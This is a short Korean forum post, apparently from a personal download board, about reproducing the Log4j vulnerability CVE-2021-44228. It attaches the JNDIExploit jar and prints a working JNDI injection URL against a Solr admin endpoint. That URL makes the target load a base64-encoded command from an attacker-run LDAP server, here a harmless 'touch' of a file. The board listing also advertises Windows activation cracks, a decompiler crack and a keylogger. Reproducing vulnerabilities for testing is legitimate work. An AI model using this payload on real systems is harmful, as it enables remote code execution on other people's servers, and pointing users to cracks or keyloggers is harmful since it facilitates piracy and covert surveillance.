메뉴 건너뛰기

pds

log4j 취약점 POC 를 위한 LDAP jar

suritam92022.09.16 10:57조회 수 43댓글 0

  • 1
    • 글자 크기

log4j 취약점 설명이 잘 되어 있는 페이지가 있다.

 

 

https://www.kisec.com/rsrh_rpt_det.do?id=783

 

CVE-2021-44228 을 재현하기 위해 해당 페이지를 참고 했다.

 

Attacker와 Butt(victim)만 있으면 재현 가능한 취약점에 비해 Communicator 까지 필요한 POC라서 이해하는데 시간이 많이 소요된다.

 

JNDIExploit-1.2-SNAPSHOT.jar 를 배포하던 저장소의 계정이 삭제되어 해당 파일을 입수하는데 시간이 걸렸다.

 

해당 JAR만 잘 실행하면 ldap을 통해 공격 코드를 전송할 수 있다.

 

한 가지 더 주의할 점은 base64 encoding 으로 보내고 decoding 시켜주는 경로를 사용해야 한다는 점이다.

 

웹 브라우저로도 테스트 가능하며 ldap은 같은 경로에서 java로 실행하여 성공하였다.

 

 

http://취약환경이있는서버:8983/solr/admin/cores?action=${jndi:ldap://ldap을실행한서버:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9jd2UtMjAyMS00NDIyOA==}

 

touch /tmp/cwe-2021-44228 는 base64 encoding한 코드이다.

 

  • 1
    • 글자 크기

댓글 달기

번호 제목 글쓴이 날짜 조회 수
112 [크랙] Windows 7 professional k 인증 크랙 박영식 2009.09.06 22741
111 [크랙] Windows 7 professional k 인증 크랙(2) 박영식 2009.09.06 19485
110 [로그] 1G 이상의 log 파일 확인을 위한 텍스트 뷰어 박영식 2012.02.03 16515
109 sothink swf decompiler 3.3 crack2 박영식 2008.06.06 16487
108 [프로그램] avi, jpg, gif를 gif, swf, avi 로 변환하는 프로그램 박영식 2009.06.18 16041
107 [XE] 언어 기반 스팸 필터2 lispro06 2013.12.20 15735
106 [폰트] 휴먼명조 유사체 박영식 2010.04.08 15444
105 [jar] NewsML Toolkit용 jar 파일들1 박영식 2010.03.18 15366
104 [문서] Diskless Cluster System에서 snort를 이용한 Multi NIDS 구현에 관한 연구 박영식 2009.05.25 13608
103 [서식] APA, MLA 포맷(기본형) 박영식 2009.11.14 13588
102 [키로거] elite keylogger lispro06 2015.05.15 13368
101 [애드온] CAPTBHA lispro06 2014.05.05 13240
100 [논문] 온라인에서 웹캠을 통한 영상 전송 및 처리 시스템에 관한 연구 박영식 2009.06.11 12662
99 로지텍 블루투스 키보드 k810 lispro06 2015.07.26 12637
98 [메일서버] hMailServer-5.1.2-B346.exe 박영식 2009.08.23 12575
97 [유틸] 컬러 피커 lispro06 2014.08.16 12498
96 USB 포맷 안 될 때 lispro06 2017.01.07 12422
95 음절빈도 계산 프로프램 소스2 박영식 2008.09.22 12397
94 usb low level formatter lispro06 2015.05.15 12355
93 [ppt] MS PowerPoint2007 새 창으로 작업하기1 박영식 2009.06.18 12302
첨부 (1)
JNDIExploit.v1.2.zip
34.26MB / Download 23
위로